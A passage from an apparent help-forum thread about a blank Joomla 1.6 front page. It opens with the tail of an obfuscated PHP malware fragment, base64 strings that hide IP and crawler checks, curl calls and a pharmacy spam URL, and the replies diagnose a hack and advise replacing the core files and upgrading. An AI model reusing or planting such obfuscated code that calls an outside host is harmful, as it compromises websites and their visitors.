MTI=','MjAzXC4xMTZcLjIwOFwuOQ==','MjAzXC4xMjdcLjE3XC4xMA==','MTk4XC4zNlwuNDBcLjI=','MjA0XC4yNTRcLjE3NVwuMjQ5','MTk4XC4xODVcLjE4XC4yMDc=','MTQxXC4yMjhcLjI1MFwuMTQx','NjFcLjI0NlwuNjFcLjQ=','MjE3XC42OVwuMTc2XC4zOQ==','NjJcLjEyOVwuMTIxXC42Mg==','MjA1XC4xNTZcLjE4MFwuMjI5','MjAyXC4xNzlcLjk3XC4xMTM=','MjAzXC4xMjZcLjE4M1wuMjc=','MjE5XC4xNDJcLjEyMlwuMTAw','MTk0XC43NFwuMTg0XC4yNDI=','MjAzXC4xMTdcLjlcLjIwMQ==','MjAzXC4xMjZcLjI0MVwuNw==','MTUyXC4yMjZcLjE4MVwuMTUy','MTk1XC4xNDVcLjE5NlwuMjY=','MTYyXC45NlwuMTA1XC44NA==','MTkzXC4xMzRcLjI1NFwuMjU=','ODZcLjk2XC4yMjhcLjkz','MTk1XC4yMjlcLjIzN1wuMzY=','MTkzXC4xMjNcLjI1MVwuMzA=','NjJcLjE4OVwuNzBcLjEyMQ==','MTkzXC4xMTdcLjMxXC4y','MTk5XC40MFwuMjA0XC4yNDU=','MTI0XC42NlwuMTI5XC4xNjY=','MTkyXC4yOFwuMFwuMjE=','MTIxXC4xMDBcLjM5XC44Mw==','MjE3XC4yMlwuMFwuMTY0','MTQ5XC4xNzFcLjE4NFwuMTIy','MjEzXC4xNDNcLjEzM1wuMjEz','MTk0XC4xMjdcLjhcLjE4','MjA1XC4yMjhcLjgyXC4xMzk=','MTkzXC4xMTBcLjEzMFwuMTAz','MjAyXC40NlwuMTE2XC4yMzA=','MjEzXC4zMVwuMTFcLjI0','MTk2XC40NlwuNThcLjIx','MjE3XC4zM1wuMTUwXC40','MjE0XC4xM1wuMzVcLjE2OQ==','MjEzXC4xNDZcLjE0OFwuNzI=','MjAzXC4xMjFcLjkwXC4xNTQ=','MTk4XC4yNDFcLjIxN1wuMTU=','MTk1XC4yMjlcLjIzNlwuMjE4','ODVcLjkxXC4xNzVcLjIyMQ==','ODNcLjEwMFwuMjE0XC45Nw==','MTIxXC4xMDBcLjM5XC44MQ==','NjVcLjIxNlwuMTM4XC4yNTM=','MjAzXC4xMTdcLjlcLjIwMg==','MTkzXC4zOVwuMTU4XC4yMDM=','MTkyXC4xOTNcLjE2NFwuOA==','MTkzXC4xOTVcLjg0XC4xNzg=','MTkzXC4yOVwuNzdcLjEwMQ==','MjEzXC40OFwuOTRcLjY1','MTVcLjIwM1wuMjMzXC44MA==','MjAzXC4xMjdcLjlcLjEzOA==','MjAzXC4xMTdcLjkyXC4y','MjEzXC4xNTJcLjIzNVwuMTI2','ODNcLjEwMFwuMTM2XC45OQ==','ODZcLjUxXC4zNFwuMzk=','MjBcLjEzM1wuMFwuOA==','MTkzXC44MlwuMTUzXC4xOTQ=','MTU1XC41NlwuNjhcLjIxNQ==','MTk1XC4yMjlcLjIzNlwuMjEz','MTM4XC4yMjdcLjE4OVwuOA==','MTU1XC4xNDBcLjI1NVwuMTE5','MTU1XC41NlwuNjhcLjIxNg==','MTk5XC4xNjZcLjE1XC4yMjk=','MTcwXC4xOTRcLjMyXC40Mg==','MTU1XC4xNDBcLjI1NVwuMjE1','MTk0XC4yMzdcLjE0MlwuMjA=','MjE3XC4zM1wuMTU0XC4yMzQ=','MjEyXC4yMTlcLjI0OVwuNQ==','MTQ3XC4xMTRcLjIyNlwuMTk0','MjE3XC4xNjlcLjEzMFwuMTA=','ODBcLjE5M1wuNjlcLjEz','MTkyXC4xMDBcLjEyNFwuMjE5','ODdcLjIzNlwuMTA1XC4yMw==','NjNcLjc4XC4yNDJcLjE0','MTkzXC4zNVwuMTBcLjU1','MTk1XC4yMjlcLjIzNlwuMjE0','MTUzXC4xMDBcLjEzMVwuMTQ=','MTk0XC4xNjhcLjQ1XC4yNTA=','MTQxXC42XC4xMVwuMTY=','NjJcLjZcLjE1NVwuODM=','MTkzXC4xMTNcLjQ4XC4xMQ==','ODBcLjE2OVwuMjAxXC4xNDc=','NjRcLjIwOFwuMTU5XC4yMzA=','MjEyXC40MVwuMTQyXC4yMDE=','MTk0XC4yMzJcLjcyXC4xMjE=','MjAzXC4xMjZcLjU2XC42','MTkzXC4xOTFcLjEzOFwuMjQw','MjE3XC4xOTZcLjIzMVwuMTIy','MTkyXC4xMDlcLjE0MFwuMzQ=','MjA5XC4yMDJcLjEwN1wuMjAz','MjEyXC4yMTdcLjEwMFwuMTg2','MTk0XC43MlwuMzVcLjExOA==','MTYwXC45NlwuMjAwXC4zNg==','MTYwXC45NlwuMjAwXC4zNQ==','MTQxXC4xOTRcLjEwXC42Mg==','MjA0XC4yNDhcLjI0XC4xNjI=','ODZcLjk2XC4yMjhcLjg0','MTk1XC45OVwuMTczXC4xOTA=','MTM0XC4yMjZcLjFcLjIzNA==','MTM4XC4yMjdcLjE4OVwuOQ==','MjEyXC4xOTBcLjY5XC44NA==','ODBcLjEyMVwuMTU0XC4xOTc=','MjE3XC4xMTdcLjIwNVwuMTgy','MTcwXC4yNTJcLjI0OFwuMjAz','MTU2XC4yNVwuNFwuMg==','MjEyXC4zOVwuMTkyXC4z','MTkzXC4yNTJcLjE3NFwuMjE2','NjJcLjk2XC4yNDFcLjEwMA==','MTkzXC45XC4yNTRcLjEwMA==','MTk5XC42NFwuNzJcLjI1Mg==','MTcwXC4xNDhcLjIxNVwuMTU2','MjEyXC4yOFwuMjQwXC4xNDg=','MTk1XC4yNDJcLjIyNFwuMTc=','MTkzXC4yNTFcLjQwXC45Ng==','MTQ3XC4xMTRcLjIyNlwuMTgy','MTk5XC4xNzNcLjIyNVwuMzM=','MTk0XC4yMDJcLjIxM1wuMjU0','MTU4XC4xNjlcLjEzMVwuMTQ=','MTk1XC4xNjBcLjE0OVwuMzc=','MTQ3XC4xMTRcLjIyNlwuMTgw','MjE3XC4xNjlcLjQ1XC4xNzA=','MTkyXC4xOTNcLjI0NVwuMTU=','MTY3XC4yMVwuMjU0XC4xMg==','MjE3XC4xMTBcLjYyXC4yMjI=','MTk1XC4yN1wuMjBcLjI=','MTk5XC4xNzJcLjE2OVwuMzI=','MTJcLjUzXC4xMzJcLjQ=','ODZcLjk2XC4yMjdcLjg2','MTk4XC4zNlwuODdcLjg3','MTY1XC44OVwuODRcLjg2','MTJcLjIyMFwuMjI0XC42Ng==','MTcxXC4xNTlcLjE5NFwuMTA=','NzhcLjEwMFwuNFwuNDE=','MjA1XC4xNzRcLjhcLjQ=','MTkzXC4yMDNcLjE5MlwuMTU=','MTkzXC4yNTFcLjY0XC4xODY=','MTU1XC45NFwuMTEwXC4yMjM=','NjNcLjY1XC4xNjZcLjEzOA==','ODhcLjIxMVwuMTkyXC4xNTE=','MjEzXC4yMTlcLjYzXC4yNTQ=','MjE2XC40NlwuOThcLjI0OQ==','ODRcLjIzNVwuMTI2XC4yMzk=','MTkyXC4xMjJcLjI1MFwuMjUw','MTJcLjMxXC4yMDJcLjQy','MTQyXC4yMVwuMTVcLjExNg==','NzBcLjQxXC42NFwuNTg=','MTNcLjE3XC4xMjVcLjg=','MjA1XC4yMjhcLjUzXC4xMg==','MTk5XC4yMDdcLjI1M1wuMTAx','MTJcLjM0XC4yNDZcLjgw','MjA3XC4xNjRcLjU4XC4xMQ==','MTk0XC42MFwuMzhcLjEw','MzRcLjI1M1wuM1wuMjAx','MjA4XC4yMDFcLjE2MFwuMg==','MTUwXC4xMTNcLjhcLjEzOA==','MjA4XC42NVwuNDBcLjk3','ODdcLjE5NFwuMTc1XC4yMzE=','MTYzXC4xNjFcLjE2XC4xNjE=','MTQxXC4yMjhcLjI1MFwuMTQy','MjA1XC4xNjZcLjIxOFwuNzA=','MTQxXC4yMjhcLjEwNlwuMTUw','MTY5XC4yMDBcLjgwXC4xNg==','MzhcLjEwMFwuNzZcLjIzNQ==','MTVcLjE5NVwuMjAxXC45MA==','MjE3XC4xNjdcLjE0N1wuMjUx','NjRcLjIwXC4xNjhcLjIx','MTcxXC4xNTlcLjE5NFwuMTE=','MjA2XC4xOTZcLjI0MVwuMTk=','MjE3XC4xMjhcLjIzNlwuMTE5','ODNcLjI0NFwuMTk3XC4xNjQ=','MTQyXC4yMVwuMTVcLjExNw==','MTQxXC4yMjhcLjEwNlwuMTQ4','MjRcLjE1M1wuMTcyXC4xMzA=','MTk1XC4yMjBcLjI0NVwuMQ==','MjA0XC41NFwuMzZcLjI0NQ==','MTk1XC4yOFwuMjI0XC41OQ==','MjEyXC4yNDBcLjE4MFwuMTE4','MTM5XC4xNDlcLjMxXC4yMzA=','MTQyXC4xNjNcLjU2XC4xODY=','ODBcLjk0XC4zMlwuOTM=','MTM4XC4zMlwuMjM1XC4zNg==','MTQxXC4yMjhcLjEwNlwuMTQ3','MTcwXC4zNVwuMjI0XC42Mw==','MjA0XC4xN1wuMTUwXC40OA==','ODZcLjk2XC4yMjZcLjkw','MTU3XC4xMjdcLjEyNFwuMTU=','MTYxXC4xODVcLjE1N1wuMjI=','MTU5XC41M1wuMTEwXC4xNDA=','NjZcLjE1MFwuODhcLjIyNw==','MjE3XC4xMFwuOTVcLjY4','MTY5XC4yNDFcLjI4XC4xOTM=','MTU2XC4xNDZcLjFcLjIwMQ==','MTY1XC4xMzBcLjEzNlwuMjA2','MTQzXC43OVwuMTNcLjY=','MjA0XC43NVwuODBcLjE3NA==','MTJcLjZcLjE0NVwuMTc4','MTJcLjRcLjI2XC4yNDg=','MTY1XC4xMzBcLjEzNlwuMjA4','ODNcLjEzNlwuNzJcLjU=','MjE2XC4yMjZcLjE4MFwuMg==','MTMxXC40NFwuMTIxXC4yMQ==','MTI4XC4xMzBcLjU2XC4yMw==','MTVcLjIxOVwuMTUzXC44MA==','MTU4XC40OFwuNlwuMTM5','MTM0XC4xMzRcLjEzOVwuNzA=','MTY5XC4yNDFcLjFcLjc1','NjdcLjExMVwuMTQwXC4xMjk=','MTk5XC42N1wuMTM4XC40Mw==','MjE2XC4yMjZcLjE4MFwuMw==','MjA1XC4xNTZcLjEzNlwuMjI5','NjNcLjk1XC4zNlwuMTM=','MjE2XC4yNlwuODhcLjgw','MTkyXC4xODhcLjIwNVwuMTk0','MTI4XC4xOTBcLjEyNVwuMg==','NjVcLjIwMFwuMTU3XC4xNzg=','MTg3XC4xNDFcLjEyXC4zMA==','MjA4XC4xOFwuMTVcLjY=','MTJcLjEyOVwuOTdcLjI1NA==','MjEzXC4zMVwuMTk1XC45MA==','MjA3XC4xNTdcLjlcLjE2OQ==','MTk1XC4yMTNcLjE4MFwuMTIw','MTk5XC4zMVwuM1wuMTk2','MTkzXC45NVwuMTcwXC45OQ==','MTk0XC4yMDNcLjE1OFwuOTc=','MTQ2XC4yMDlcLjEzMFwuMg==','MTk0XC42MFwuMzhcLjE5OA==','MTkyXC4yMzRcLjk5XC4x','MTYyXC4xMDZcLjZcLjM=','MTM3XC4yNDBcLjEzNlwuNzA=','MjA2XC4xMzBcLjE3M1wuNTU=','NjJcLjE2MVwuMTU3XC4yMjA=','MTQ4XC4yMzZcLjVcLjky','MTk5XC4xOThcLjIyM1wuMTA2','MTk1XC4yMjlcLjI0MlwuNTk=','MTI5XC4xODhcLjMzXC4yNg==','ODZcLjk2XC4yMjZcLjkz','MTk5XC42N1wuMTMxXC4xNTI=','MTQ2XC4yMDlcLjEzMFwuMjEx','NjVcLjIxMVwuMTI2XC4xNA==','MTY5XC4yMDBcLjgwXC4xNw==','MTk5XC4xNzJcLjE2OVwuMjE=','MjA1XC4yMjhcLjgyXC4xNzE=','MTQwXC4xMzlcLjM1XC4yNTA=','MTk5XC4xNjlcLjIwNFwuNA==','MTkzXC4xODhcLjEwNVwuMjA=','OFwuN1wuMjI4XC4yNTI=','MjA4XC4zNVwuMzhcLjEx','MTMyXC40OVwuMjIxXC4yNQ==','MTJcLjExXC4wXC4yNDc=','MjA0XC44OVwuNzRcLjEzNg==','MTYwXC44NFwuMjU0XC4yNDE=','MzhcLjExMlwuMTJcLjExMA==','NTdcLjc3XC4xMVwuNA==','MTMwXC4yMFwuMTg4XC40OA==','MjBcLjEzN1wuMThcLjUz','MTkyXC4xMzhcLjIwNVwuMTQ0','MTYxXC4xNjJcLjRcLjI0','MjA0XC4xMDRcLjU1XC4yNDQ=','MTQ3XC4xMTRcLjIyNlwuMTkz','NzVcLjE1MVwuN1wuMTg5','MTYwXC4xMzNcLjFcLjIyOA==','MjEwXC4xNDNcLjM1XC4xMg==','MjA0XC4xNTJcLjIzOVwuMjE5','MTcwXC45M1wuMTQwXC40Mg==','NjZcLjI0OVwuWzYtOV1bMC05XVwuWzAtOV0r','NzBcLjkxXC4xODBcLjI1','NjVcLjVbMi01XVwuWzAtOV0rXC5bMC05XSs=','NzRcLjZcLlswLTldK1wuWzAtOV0r','MTc4XC4xNThcLjIxNFwuMzY=','NjdcLjE5NVwuWzAtOV0rXC5bMC05XSs=','I14=','JCM=','UkVNT1RFX0FERFI=','LU5PLVdBWS0=','SFRUUF9VU0VSX0FHRU5U','LU5PLVdBWS0=','aHR0cDovL2dvbGRwaGFybWFjeS5uZXQva2F0YWxvZy9wdWJsaWNyZWNvcmRzaW4vc2hvdy5waHA/aD0=','SFRUUF9IT1NU','Jm09','UkVRVUVTVF9VUkk=','Y3VybF9pbml0','YWxsb3dfdXJsX2ZvcGVu');return base64_decode($a[$i]);} ?>
```

I can access the admin page and the front page seems fine in the Joomla Editor but it's completely broken when I try to open it.

What I did to debug the issue was to make a copy of the site's directory in the server, install Joomla from scratch on that folder and with a brand new database. However, I get pretty much the same result - an empty white page with the above source code when I Ctrl-U. My index.php is Joomla's default and it looks pretty sane.

Neither changing the default template or activating "Site Offline" seem to fix the issue - front page always blank.

Comment: Why on earth are you using Joomla 1.6? You do realise it was released 4 years ago (not supported anymore) as a kind of beta for 2.5, which is also no longer supported. You need to migrate to 3.x

Comment: Yes, I realize that but this is an old website that needs maintenance. I understand I need to migrate to 3.x but am leaving that as a last option.

Comment: Migrating should not be your last but your first. It's quite possible that your site has been hacked due to being on such an old version of Joomla which has a lot of security vulnerabilities. Only thing I can suggest if checking your template index.php file to see if the code you mentioned in there

Comment: once you have followed the instructions in the answer below, get your site upgraded immediately to Joomla 2.5. To do this, you will need to manually  update to 1.7, the from then on, it a simple 1 click update in the admin backend. 2.5 has so many security and bug fixes which are extremely important.

Answer (score 1, accepted):

The reason why is because someone hacked your old version of Joomla.
And that's happen because all the time a new version is coming out the bugs and the exploits of the previous version are released.

To fix your problem what you have to do is download Joomla 1.6 [here](http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=6007)

Extract the zip files and replace the core files of Joomla.
You can do that just dropping the good files in the root of your local installation.

Be careful about config.php probably you have to fix it as well.